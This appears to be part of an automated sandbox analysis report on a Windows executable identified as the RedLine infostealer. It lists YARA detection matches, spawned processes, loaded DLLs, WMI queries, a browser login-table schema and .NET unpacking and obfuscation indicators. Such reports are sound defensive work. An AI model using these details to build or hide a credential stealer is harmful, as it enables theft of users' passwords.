                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_00A743E80_2_00A743E8
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_00A7E0940_2_00A7E094
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_00A770510_2_00A77051
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698F7880_2_0698F788
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069841C40_2_069841C4
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698F7780_2_0698F778
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069800400_2_06980040
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069841BD0_2_069841BD
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_06986D330_2_06986D33
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698CAD80_2_0698CAD8
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698CAC70_2_0698CAC7
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698C8300_2_0698C830
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_0698C8400_2_0698C840
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A3D800_2_069A3D80
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A3DFB0_2_069A3DFB
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A86700_2_069A8670
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A93800_2_069A9380
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A73D00_2_069A73D0
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A73C10_2_069A73C1
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069AE0F00_2_069AE0F0
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A6F980_2_069A6F98
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A8F380_2_069A8F38
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A6F5C0_2_069A6F5C
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A8F480_2_069A8F48
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 0_2_069A3D700_2_069A3D70
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_0188E7B02_2_0188E7B0
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_0188DC902_2_0188DC90
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B144682_2_06B14468
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B196282_2_06B19628
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B112102_2_06B11210
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B133202_2_06B13320
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B1DD002_2_06B1DD00
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B1D1082_2_06B1D108
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 2_2_06B1D9E62_2_06B1D9E6
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1684012075.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000000.1657210728.0000000000182000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametdrF.exeF vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688992611.00000000073B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003344000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.00000000013D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exeBinary or memory string: OriginalFilenametdrF.exeF vs lWnSA7IyVc.exe
                      Source: lWnSA7IyVc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: lWnSA7IyVc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, g9F7EWXCs481SYWDaY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, g9F7EWXCs481SYWDaY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/45@1/1
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lWnSA7IyVc.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile created: C:\Users\user\AppData\Local\Temp\tmp42CB.tmpJump to behavior
                      Source: lWnSA7IyVc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: lWnSA7IyVc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tmp42DB.tmp.2.dr, tmp42ED.tmp.2.dr, tmp42CB.tmp.2.dr, tmp42FE.tmp.2.dr, tmp42EE.tmp.2.dr, tmp42EC.tmp.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: lWnSA7IyVc.exeReversingLabs: Detection: 68%
                      Source: unknownProcess created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: lWnSA7IyVc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: lWnSA7IyVc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs.Net Code: jVNRG9d43l System.Reflection.Assembly.Load(byte[])
